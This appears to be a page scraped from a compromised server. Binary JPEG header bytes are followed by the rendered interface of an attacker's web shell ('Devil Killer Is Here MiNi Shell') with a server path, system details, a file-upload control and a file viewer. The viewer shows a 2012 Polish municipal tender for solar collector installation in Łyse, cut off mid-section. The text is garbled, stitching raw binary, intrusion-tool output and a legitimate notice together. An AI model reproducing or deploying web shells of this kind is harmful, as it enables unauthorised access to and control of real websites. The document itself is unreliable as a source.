JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120910/338584-N-2012.html

<p class="kh_header"><b>Łyse: Wykorzystanie odnawialnych źródeł energii na Kurpiowszczyźnie 
poprzez kompleksowy montaż kolektorów słonecznych w gminie Łyse</b><br>
<b>Numer ogłoszenia: 338584 - 2012; data zamieszczenia: 10.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łyse , ul. Ostrołęcka 2, 07-437 Łyse, woj. mazowieckie, tel. 29 7725027 wew.44, faks 29 7725003 w. 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminalyse.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykorzystanie odnawialnych źródeł energii na Kurpiowszczyźnie 
poprzez kompleksowy montaż kolektorów słonecznych w gminie Łyse.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie roboty budowlanej, polegającej na zamontowaniu instalacji kolektorów słonecznych w celu przygotowania ciepłej wody użytkowej w 218 budynkach mieszkalnych, położonych na terenie Gminy wraz z wpięciem ich do istniejących na poszczególnych obiektach instalacji podgrzewu ciepłej wody użytkowej wraz z ich rozruchem technologicznym i instruktarzem docelowych użytkowników w zakresie obsługi-eksploatacji, korzystania z dostarczonego i zamontowanego układu oraz warunków gwarancyjnych. Wykonanie przedmiotowej roboty stanowi główną część realizacji projektu: Wykorzystanie odnawialnych źródeł energii na Kurpiowszczyźnie poprzez kompleksowy montaż kolektorów słonecznych w gminach: Łyse i Baranowo, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu IV - Środowisko, zapobieganie zagrożeniom i energetyka, - Działania 4.3 - Ochrona powietrza, energetyka, Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2007 - 2013.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ   szczegółowy opis przedmiotu zamówienia oraz załącznik nr. 10 do SIWZ -  dokumentacja techniczna (specyfikacje techniczne wykonania i odbioru robót budowlanych, projekty budowlane, przedmiary robót, tabela elementów scalonych)
Wykonanie zamówienia musi być zgodne z przepisami obowiązującego prawa: w szczególności z ustawą - Prawo budowlane, ustawą - Kodeks cywilny, ustawą Prawo zamówień publicznych, przepisami dotyczącymi bezpieczeństwa i higieny pracy, zgodne z zasadami wiedzy technicznej, należytą starannością, jakością i organizacją pracy. 
W trakcie realizacji prac należy stosować wyłącznie nowe materiały i wyroby posiadające obowiązujące świadectwa dopuszczenia do stosowania w budownictwie lub jeśli są przedmiotem norm zaświadczenie producenta potwierdzające ich zgodność z postanowieniami odpowiednich norm. Wykonawca wykona przedmiot umowy z materiałów własnych oraz ponosi odpowiedzialność za wykonanie całości zamówienia. 

Przedmiot zamówienia wg kodów klasyfikacji Wspólnego Słownika Zamówień Publicznych CPV : 

       09331100-9 Kolektory słoneczne do produkcji ciepła 
       45300000-0 Roboty instalacyjne w budynkach 
       45330000-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne 

Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, eksploatacyjnych i użytkowych, lecz nie gorszych niż wskazane przez Zamawiającego. 
Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać, że oferowane przez niego roboty budowlane, materiały i urządzenia spełniają wymagania określone przez Zamawiającego. 
Zamawiający przewiduje możliwość zaistnienia konieczności zmiany miejsca montażu instalacji solarnych przy utrzymaniu podstawowych parametrów instalacji kolektorów słonecznych (metraż kolektorów, wielkość zasobnika itp.)

1. Szczegółowy opis przedmiotu zamówienia 
a) Przedmiot zamówienia może być realizowany z wykorzystaniem wyłącznie nowych, nieużywanych i dopuszczonych do stosowania urządzeń wyprodukowanych nie wcześniej niż w 2010 roku oraz technologii spełniających normy ekologiczne Unii Europejskiej  określone w obwieszczeniach Prezesa Polskiego Komitetu Normalizacyjnego w sprawie wykazu norm zharmonizowanych 
b) Wykonawca na min. 10 dni przed montażem instalacji dokona wizji w terenie każdej z lokalizacji, w celu potwierdzenia gotowości obiektu do montażu kolektorów oraz weryfikacji miejscowych (lokalnych) warunków technicznych umożliwiających korzystanie z dostarczonego i zamontowanego zestawu paneli słonecznych. Teren realizacji projektu stanowi obszar Gminy Łyse.
c) Wykonawca na 10 dni przed rozpoczęciem prac montażowych przedstawi i uzgodni z Użytkownikiem (dysponentem nieruchomości) i inspektorem nadzoru inwestorskiego termin rozpoczęcia robót.
d) Przed rozpoczęciem każdego z roboczych etapów realizacji projektu (po 30 instalacji) wykonawca zobowiązany jest do zorganizowania spotkania z mieszkańcami w celu przedstawienia harmonogramu wizji w terenie, organizacji dostaw i montażu elementów zamówienia oraz innych kwestii związanych z przygotowaniem obiektu do realizacji przedsięwzięcia. Zamawiający na czas spotkania zapewnia odpowiednią salę z nagłośnieniem 
e) Wykonawca przed każdym wejściem na obiekt budowlany zobowiązany jest uzgodnić z 
Zamawiającym (lub wyznaczonym przez niego przedstawicielem np. użytkownikiem terenu) niezbędny sposób prowadzenia robót, miejsce składowania materiałów niezbędnych do realizacji prac w sposób umożliwiający funkcjonowanie, będących w sąsiedztwie obiektów budowlanych oraz sposób prowadzenia pozostałych robót modernizacyjnych. 
f) Wykonawca jest odpowiedzialny za ogrodzenie i oznakowanie tablicami ostrzegawczymi oraz zakazem wstępu na budowę zgodnie z wymogami obowiązujących przepisów 
g) Wszelkie prace na dachu należy wykonać z podnośnika (zwyżki) z zabezpieczeniem, z rusztowania z zabezpieczeniem lub w inny uzgodniony z inspektorem nadzoru sposób, zawsze zgodnie z wymogami przepisów BHP. 
h) Osoby sprawujące bezpośredni nadzór i wykonujące bezpośrednio prace montażowo-technologiczne muszą posiadać odpowiednie uprawnienia i świadectwa kwalifikacyjne. 
i) Osoby wykonujące prace na wysokości muszą posiadać odpowiednie badania wysokościowe. 
j) Zabezpieczenie prac na dachach, odpowiedzialność za potencjalne uszkodzenia oraz dostępność do dachów wskazanych do realizacji posesji leżą po stronie i ryzyku Wykonawcy. 
k) Koszt zabezpieczenia terenu budowy nie podlega odrębnej zapłacie i przyjmuje się, że jest włączony w cenę kontraktową. 
l) Zakres robót związanych z realizacją przedmiotu zamówienia powinien przebiegać tak aby ograniczyć wpływ montażu zestawów solarnych na architekturę obiektów lub budynków. 
m) Przed rozpoczęciem prac Wykonawca powinien ubezpieczyć realizację zamówienia od ryzyk związanych z wykonywanymi pracami. 
n) Wykonawca zobowiązuje do prowadzenia, na potrzeby realizacji Przedmiotu Zamówienia, wewnętrznych dzienników budowy w których odnotowywane będą postępy prac. Wpisy w dziennikach wymagają zatwierdzenia przez Inspektora Nadzoru. 
o) Wykonawca zobowiązuje się do utrzymania porządku na placach budów. Wykonawca na swój koszt usunie wszelkie śmieci i nieczystości z miejsc wykonywania prac. Ponadto Wykonawca zobowiązuje się doprowadzić lokalizacje, w których były prowadzone prace, do stanu poprzedniego (z wyłączeniem przedmiotu niniejszej umowy). 
p) Protokoły obiorów częściowych muszą być podpisane przez Użytkownika i Inspektora nadzoru inwestorskiego. 
r) Instalacja kolektorów słonecznych musi zapewniać prawidłowe współdziałanie z istniejącymi systemami cwu celem uzyskania maksymalnego efektu ekologicznego.
2. Opis szczegółowych parametrów elementów zamówienia 
Należy spełnić parametry minimalne. Dopuszcza się zastosowanie elementów równoważnych do podanych, spełniających wszystkie podane parametry i minimalne wymagania. 
W celu zapewnienia otrzymania zakładanych rezultatów przy realizacji inwestycji, oraz gwarancji utrzymania niezmiennej jakości dostarczanych kolektorów słonecznych, zamawiający wymaga aby potwierdzić parametry kolektora słonecznego dołączając do oferty sprawozdanie z badań wg normy PN-EN 12975-2 wykonane przez akredytowane laboratorium badawcze oraz certyfikat wydany przez akredytowaną jednostkę certyfikującą na zgodność z normą: PN-EN 12975-1, PN-EN 12975-2 lub europejski certyfikat na znak SOLAR KEYMARK nadany przez jednostkę certyfikującą, lub inny równoważny dokument potwierdzający równoważność jakościową oferowanych kolektorów słonecznych. 
Zamawiający wymaga aby certyfikat równoważny do opisanych powyżej potwierdzał, że:
- do badań losowo pobierane były urządzenia z linii produkcyjnej w zakładzie producenta
- prawidłowość zaświadczenia weryfikowana jest poprzez losowe pobieranie urządzeń do badań na zgodność z normą przez cały okres obowiązywania zaświadczenia. 
 W przypadku polskich jednostek certyfikujących należy także przedstawić dokumenty, że jednostka uzyskała akredytację Polskiego Centrum Akredytacji (PCA) i została uznana przez Ministerstwo Gospodarki - (aktualny certyfikat akredytacji zgodnie z Dz.U. z 2010 r. Nr 138, poz.935 ze zmianami art.16 pkt 1,2).

A.	MATERIAŁY:
1)	Kolektory słoneczne 
Minimalne parametry techniczne jakie mają posiadać zastosowane płaskie kolektory 
słoneczne: 
Parametry techniczne jakie mają posiadać zastosowane kolektory słoneczne płaskie:
- typ kolektora: płaski,
- minimalna powierzchnia absorpcji:
Zestaw kolektorów A - łączna powierzchnia czynna kolektorów - minimum  4,6 m2, 
Zestaw kolektorów B - łączna powierzchnia czynna kolektorów - minimum  6,9 m2, 
Zestaw kolektorów C - łączna powierzchnia czynna kolektorów - minimum  9,2 m2, 
Zestaw kolektorów D - łączna powierzchnia czynna kolektorów - minimum  11,5 m2, 

- sprawność optyczna kolektora słonecznego min. 78,0 %, 
- materiał obudowy kolektora: rama kolektora wykonana z profilu aluminium o sztywnej konstrukcji,
- materiał absorbera i przyjmowanie ciepła: aluminium lub miedź z powłoką wysoko selektywną (np. tytanową)
- szkło solarne: szkło bezpieczne z powłoką antyrefleksyjną,   
- współczynnik strat (liniowy) a1: max 4,00 (W:m2 K),
- współczynnik strat (kwadratowy) a2 : max 0,018 (W:m2 K2).
- Maksymalna dopuszczalna temperatura pracy (temp. stagnacji) przy GS=1000(W:m2) i dT= 30(stopni Celsjusza) - minimum 190 stopni Celsjusza
- maksymalne ciśnienie robocze - min. 6 bar. 
- wymiary oraz modele wszystkich kolektorów montowanych w obrębie nieruchomości jak i całej Gminy Łyse powinny być takie same.
Wymienione parametry kolektora słonecznego należy potwierdzić dołączając do oferty sprawozdanie z badań wg normy PN-EN 12975-2 wykonane przez akredytowane laboratorium badawcze oraz certyfikat wydany przez akredytowaną jednostkę certyfikującą na zgodność z normą: PN-EN 12975-1, PN-EN 12975-2 lub europejski certyfikat na znak SOLAR KEYMARK nadany przez jednostkę certyfikującą, lub inny równoważny dokument potwierdzający równoważność jakościową oferowanych kolektorów słonecznych. 
Zamawiający wymaga aby certyfikat równoważny do opisanych powyżej potwierdzał, że:
- do badań losowo pobierane były urządzenia z linii produkcyjnej w zakładzie producenta
- prawidłowość zaświadczenia weryfikowana jest poprzez losowe pobieranie urządzeń do badań na zgodność z normą przez cały okres obowiązywania zaświadczenia. 
W przypadku polskich jednostek certyfikujących należy także przedstawić dokumenty, że jednostka uzyskała akredytację Polskiego Centrum Akredytacji (PCA) i została uznana przez Ministerstwo Gospodarki - (aktualny certyfikat akredytacji zgodnie z Dz.U. z 2010 r. Nr 138, poz.935 ze zmianami art.16 pkt 1,2).

2)	Posadowienie kolektorów płaskich.
Mocowania konstrukcji wsporczych, stelaży i samych kolektorów należy wykonać zgodnie z zaleceniami producenta kolektorów słonecznych.
3)	Automatyka.
Układ sterowania - automatyki kolektorów słonecznych powinien realizować następujące funkcje:
- kontrolować proces przekazywania energii solarnej z kolektorów do zasobników c.w.u.,
- prosty podgląd wszystkich mierzonych temperatur i stanów wyjść,
- płynne sterowanie pracą pomp obiegowych w zależności od różnicy temperatur
- dokładny pomiar prędkości przepływu płynu solarnego,
- funkcja schłodzenia kolektorów do osiągnięcia wartości maksymalnej odbiornika,
- możliwość dostosowania różnicy temperatur, przy której nastąpi załączenie i wyłączenie pracy pompy solarnej, pompy podmieszania i zaworu trójdrogowego,
- zabezpieczać odbiorniki ciepła oraz urządzenia instalacji glikolowej przed przekroczeniem ich temperatury maksymalnej,
- możliwość ustawienia wartości minimalnej i maksymalnej temperatury kolektorów słonecznych oraz maksymalnej temperatury zbiornika,
- czytelna sygnalizacja nieprawidłowości w pracy instalacji kolektorów słonecznych,
- realizować funkcję pracy w trybie urlopowym
- realizować funkcję zliczania uzyskanej energii


4)	 Zasobniki ciepła
Zbiornik z wbudowanymi wężownicami grzewczymi, z których jedna ma być zasilana z instalacji kolektorów słonecznych, druga z układu c.o. posiadający dodatkowo grzałkę elektryczną. Należy zastosować zbiorniki wyposażone w izolacje termiczną oraz anodę tytanową, która zabezpieczy zasobniki przed ewentualną korozją.  
W razie konieczności należy zastosować zasobniki o obniżonej wysokości podpór (wsporników) - według indywidualnego zamówienia u producenta - co umożliwi swobodny ich montaż w pomieszczeniu węzła solarnego oraz docelową swobodną obsługę i konserwację urządzeń.
Izolacja termiczna zasobników powinna zapewniać przewodność nie wyższą niż 0,035 W na m*K

5)	 Pompy
W obiegu zastosować zespół pompowy wyposażony w armaturę odcinającą, zawór zwrotny, miernik przepływu, manometr, zawór bezpieczeństwa, separator powietrza, zawór regulacyjny z rotametrem, termometry oraz izolację termiczną, napięcie znamionowe ~230V, zastosować urządzenia o klasie energetycznej A lub lepszej
W układzie uzupełniania obiegu glikolowego zastosować zestaw do napełniania. 

6)	 Urządzenia zabezpieczające instalacje przed wzrostem ciśnienia
Do zabezpieczenia instalacji w obiegu glikolowym i po stronie wody wodociągowej zastosować membranowe zawory bezpieczeństwa posiadające dopuszczenie i certyfikaty zgodnie z obowiązującymi przepisami Dozoru Technicznego, ciśnienie otwarcia zaworu: 6 bar.
W obiegu glikolowym zastosować przeponowe naczynie wzbiorcze na maksymalne ciśnienie =>10bar, posiadające dopuszczenia i certyfikaty zgodnie z obowiązującymi przepisami Dozoru Technicznego;

7)	 Aparatura regulacyjno - pomiarowa
W układzie kolektorów słonecznych zastosować regulator systemów solarnych (elektroniczny różnicowy regulator dla instalacji solarnej) nadzorujący prace układu pozyskania energii słonecznej o parametrach zgodnych z projektem technicznym.

8)	 Izolacja termiczna
Przewody obiegu glikolowego izolować otulinami termoizolacyjnymi z pianki poliuretanowej.  Odcinki rurociągów prowadzone na zewnątrz budynku zabezpieczyć zewnętrznym płaszczem tzn. przewody prowadzić w rurach osłonowych dwudzielnych przystosowanych do pracy w zewnętrznych warunkach atmosferycznych. Do izolacji zasobników zastosować oryginalne otuliny dostarczane przez producenta. Otuliny muszą posiadać aprobatę techniczną o dopuszczeniu do stosowania w budownictwie. 

9)	 Płyn solarny - należy zastosować  płyn solarny o parametrach: 
-	 wodny roztwór glikolu propylenowego o zawartości wody od 55 do 58%,
-	o gęstości min 1,032 g na cm3,
-	temperatura zespolenia min : - 28 0C,
-	pH = 9,0 - 10,5

B.	SPRZĘT
Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie spowoduje niekorzystnego wpływu na jakość wykonywanych robót, zarówno w miejscu tych robót, jak też przy wykonywaniu czynności pomocniczych oraz w czasie transportu, załadunku i wyładunku materiałów.

C.	TRANSPORT I SKŁADOWANIE
Rury w wiązkach muszą być transportowane na samochodach o odpowiedniej długości. Kształtki należy przewozić w odpowiednich pojemnikach. Podczas transportu, przeładunku i magazynowania rur i kształtek należy unikać ich zanieczyszczenia. Zbiorniki, zasobniki oraz przeponowe naczynia wzbiorcze powinny być transportowane w oryginalnych opakowaniach krytymi środkami transportu w sposób zabezpieczający je przed przemieszczaniem się aby nie uszkodzić wewnętrznych powłok antykorozyjnych. Dostarczoną na budowę armaturę i urządzenia składować należy w magazynach zamkniętych. Urządzenia powinny być dostarczone w oryginalnych opakowaniach producenta. Armaturę, łączniki i materiały pomocnicze należy przechowywać w magazynach lub pomieszczeniach zamkniętych w pojemnikach. Materiały przeznaczone do wykonywania izolacji cieplnych powinny być przewożone krytymi środkami transportu w sposób zabezpieczający je przed zawilgoceniem, zanieczyszczeniem i zniszczeniem. Wyroby i materiały stosowane do wykonywania izolacji cieplnych należy przechowywać w pomieszczeniach krytych i suchych. Materiały przeznaczone do wykonywania izolacji ciepłochronnej powinny mieć płaszczyzny i krawędzie nie uszkodzone, a odchyłki ich w stosunku do nominalnych wymiarów produkcyjnych powinny zawierać się w granicach tolerancji określonej w odpowiednich normach przedmiotowych.

D.	WYKONANIE ROBÓT.
Roboty montażowe będą obejmowały:
- Montaż kolektorów słonecznych na połaciach dachowych
- Posadowienie zbiorników c.w.u.
- Wykonanie instalacji łączących kolektory ze zbiornikami i jej ocieplenie
- Montaż armatury (termometry, zawory bezpieczeństwa, zawory zwrotne, itp.)
- Montaż zespołu pompowego z osprzętem
- Montaż zespołu naczynia przeponowego
- Instalacja układu sterującego, automatyki i wizualizacja pracy instalacji
- Wykonanie prób ciśnienia instalacji 
- Napełnienie instalacji płynem solarnym
- Uruchomienie instalacji
- Instruktaż użytkowników
- Prowadzenie dokumentacji z wykonywanych robót
- Sporządzenie instrukcji obsługi i użytkowania dla każdej wykonanej instalacji solarnej
- Oraz inne prace wymienione w Specyfikacji Istotnych Warunków Zamówienia  oraz w dokumentacji technicznej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp, zgodnie z warunkami określonymi w ustawie.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.33.11.00-9, 45.30.00.00-0, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości 100 000,00 zł (słownie: sto tysięcy złotych) w formie, o której mowa w art. 45 ust. 6 ustawy z dnia 29 stycznia 2004 r.  Prawo zamówień publicznych. 

2.  Wadium należy wnieść przed upływem terminu składania ofert. 

3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy  - Gmina Łyse prowadzony przez Kurpiowski Bank Spółdzielczy w Myszyńcu numer rachunku 22 8920 0001 0013 6800 2000 0040. Na przelewie należy umieścić informację wadium - Wykorzystanie odnawialnych źródeł energii na Kurpiowszczyźnie poprzez kompleksowy montaż kolektorów słonecznych w gminie Łyse. Za termin wniesienia wadium uznaje się datę i godzinę wpływu środków pieniężnych na rachunek bankowy Zamawiającego. 

4. Wadium wnoszone w formie poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancji bankowych, gwarancji ubezpieczeniowych, poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.) należy złożyć w siedzibie Zamawiającego w Urzędzie Gminy w Łysych, ul. Ostrołęcka 2, pok. 22 na ręce pracownika Urzędu Gminy Łyse, który będzie przyjmował oferty.

5. Wadium wnoszone w formie poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancji bankowych, gwarancji ubezpieczeniowych, poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości winno zawierać:
a) wskazanie gwaranta lub poręczyciela (nazwa podmiotu udzielającego gwarancji lub poręczenia),
b) wskazanie beneficjenta (Gmina Łyse),
c) określenie terminu obowiązywania gwarancji lub poręczeń (musi obejmować okres związania z ofertą),
d) określenie kwoty poręczenia lub gwarancji (musi być równa kwocie wadium), 
e) gwarantować wpłatę należności w sposób nieodwołalny, bezwarunkowy i na każde żądanie.
f) przyczyny zatrzymania wadium przez Zamawiającego, określone w rozdziale XII pkt 10 SIWZ.

6. Wykonawca, który nie zabezpieczy oferty wymaganą formą wadium zostanie wykluczony z postępowania.

7. Zamawiający zwraca niezwłocznie wadium, jeżeli:
a) upłynął termin związania  ofertą,
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy, 
c) Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

8. Zamawiający zwraca niezwłocznie wadium z zastrzeżeniem art. 46 ust. 4a Pzp na pisemny wniosek Wnioskodawcy w przypadku zaistnienia okoliczności enumeratywnie wymienionych w art. 46 ust. 2 Pzp. Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 2 pkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.

9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 

10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
d) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 Pzp, nie złożył  dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 Pzp, lub pełnomocnictw.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu - wzór zał. nr 3 do SIWZ (oryginał) 
